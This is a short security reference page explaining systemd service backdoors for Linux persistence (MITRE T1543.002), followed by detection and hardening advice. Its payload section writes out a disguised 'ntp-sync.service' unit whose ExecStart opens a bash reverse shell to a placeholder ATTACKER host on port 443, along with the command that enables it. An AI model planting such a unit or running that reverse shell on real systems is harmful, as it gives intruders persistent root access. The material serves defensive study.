A systemd service backdoor creates a malicious systemd unit (a .service, often paired with a .timer) so the attacker’s payload starts automatically at boot, typically as root, on modern Linux. Once enabled, it survives reboots and restarts itself, the Linux equivalent of a Windows service backdoor. System-wide units need root; users can also create user units in their own context. It maps to MITRE T1543.002.
What it is
systemd is the init system and service manager on most modern Linux distributions. It starts and supervises services defined in unit files (.service), and can run them at boot and restart them if they die. Timer units (.timer) provide cron-like scheduling.
A systemd service backdoor is an attacker-created unit whose ExecStart is their payload, enabled so systemd launches it at every boot, usually as root.
The technique and payload
With root, the attacker drops and enables a unit:
- Create
/etc/systemd/system/ntp-sync.servicewithExecStart=/usr/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER/443 0>&1'andRestart=always. - Enable it so it runs at boot:
systemctl enable --now ntp-sync.service. - Or use a `.timer` unit for periodic execution, or a user unit (
~/.config/systemd/user/) for non-root persistence.
The service relaunches at every boot (and restarts on failure) as root. Documented for defensive context.
How to defend
- Monitor systemd unit directories (
/etc/systemd/system/,/usr/lib/systemd/system/, user unit paths) for new or changed units via file integrity monitoring. - Baseline enabled services and timers (
systemctl list-unit-files --state=enabled,list-timers) and review them. - Alert on units with
ExecStartrunning shells, network callbacks, or binaries in/tmpand hidden paths. - Limit root, required for system-wide units.
- Audit after incidents for rogue
.service/.timerfiles.
References
- [1]MITRE ATT&CK: Create or Modify System Process (T1543)(MITRE)
- [2]Linux man-pages: systemd.service(man7.org)
- [3]MITRE ATT&CK: Persistence (TA0003)(MITRE)